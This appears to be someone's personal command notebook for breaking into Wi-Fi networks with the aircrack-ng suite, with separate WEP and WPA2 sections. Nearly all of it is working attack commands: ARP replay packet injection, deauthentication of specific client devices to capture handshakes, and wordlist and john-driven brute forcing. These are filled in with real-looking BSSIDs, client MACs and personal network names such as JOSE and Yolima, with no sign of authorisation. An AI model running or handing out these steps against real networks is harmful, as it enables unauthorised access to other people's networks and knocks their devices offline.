1. sudo airmon-ng start wlan0 <#>
2. sudo aireplay-ng --test mon0
3. sudo aireplay-ng --interactive mon0
   sudo aireplay-ng -b bssid --interactive mon0
   sudo aireplay-ng --arpreplay -b <bssid> -e <essid> mon0
   sudo aireplay-ng --arpreplay -b <bssid> -e <essid> --ignore-negative-one mon0
   (sudo aireplay-ng -b F4:55:9C:11:AF:A0 --interactive mon0)
4. sudo airodump-ng -r replay_src-1020-223132.cap -w mamita_oct-20 mon0
   sudo airodump-ng -r replay_src-1020-223132.cap -i -w mamita_oct-20 mon0
   sudo airodump-ng -r replay_src-1020-223132.cap --ivs --channel 6 --showack --write mamita_oct-20 mon0
   (sudo airodump-ng -r replay_src-0812-215935.cap --ivs --bssid F4:55:9C:11:AF:A0 --channel 10 --showack --write ~/scripts/airmon/MARIA mon0)
5. aircrack-ng mamita_oct-20-01.ivs

WPA2

1. sudo airmon-ng start wlan0 <wi-fi adapter channel>
   (sudo airmon-ng start wlan0 11)
2. sudo aireplay-ng --test mon0
   sudo aireplay-ng -e <essid> --test --ignore-negative-one mon0 
   (sudo aireplay-ng -a EC:23:3D:56:DD:48 -e SIERRA_PAR --test --ignore-negative-one mon0)
   (sudo aireplay-ng -e Motorisa -a F8:1A:67:D1:06:FC --test --ignore-negative-one mon0)
   (sudo aireplay-ng -a BC:14:01:B6:D5:CF -e BRALEX --test --ignore-negative-one mon0)
3. sudo airodump-ng --bssid <> --channel <> --write scripts/airmon/<file> mon0
   (sudo airodump-ng --bssid  7C:05:07:A9:AB:96 --channel 1 --write scripts/airmon/JOSE mon0)
   (sudo airodump-ng --bssid EC:23:3D:56:DD:48 --channel 11 --write scripts/airmon/Yolima mon0)
   (sudo airodump-ng --bssid C8:D1:5E:D9:7C:0C --channel 11 --write scripts/airmon/Angelamaria mon0)
   # DO NOT?
   (sudo airodump-ng --bssid  7C:05:07:A9:AB:96 --channel 1 --ivs --write scripts/airmon/JOSE mon0)
4. sudo aireplay-ng --deauth 5 -a <bssid> -c <STATIONMAC> mon0
   sudo aireplay-ng --deauth 5 -a <bssid> -c <STATIONMAC> -e <essid> --ignore-negative-one mon0
   (sudo aireplay-ng --deauth 5 -a  EC:23:3D:56:DD:48 -c 94:39:E5:AE:C3:13 -e SIERRA_PAR --ignore-negative-one mon0)
   (sudo aireplay-ng --deauth 5 -a 7C:05:07:A9:AB:96 -c 7C:FA:DF:A4:A8:94 -e JOSE --ignore-negative-one mon0)
   (sudo aireplay-ng --deauth 1 -a EC:23:3D:56:DD:48  -c 70:1A:04:7A:AA:CA -e **Yolima** --ignore-negative-one mon0)
   (sudo aireplay-ng --deauth 5 -a C8:D1:5E:D9:7C:0C -c 2C:44:01:63:4E:21 -e Angelamaria --ignore-negative-one mon0)
5. sudo aircrack-ng -w passlist.txt <*.cap>
   # Check WPA Handshake
   (aircrack-ng scripts/airmon/Yolima-*.cap)
   # Crack
   (aircrack-ng scripts/airmon/JOSE.ivs -w scripts/airmon/tbswordlist1.txt)
   (aircrack-ng scripts/airmon/Yolima-*.cap -w scripts/airmon/tbswordlist1.txt)
   (john --stdout --incremental | aircrack-ng scripts/airmon/Yolima-*.cap --bssid EC:23:3D:56:DD:48 -w -)
   (john --stdout --incremental | aircrack-ng scripts/airmon/Angelamaria-*.cap --bssid C8:D1:5E:D9:7C:0C -w -)
   (john --restore --session=motorisa | aircrack-ng motorisa\ apto-01.cap --bssid F8:1A:67:D1:06:FC -w -)

ivstools --convert <pcap file> <ivs output file>
ivstools --merge <ivs file 1> <ivs file 2> .. <output file>
(ivstools --merge scripts/airmon/JOSE-0?.ivs  scripts/airmon/JOSE.ivs)
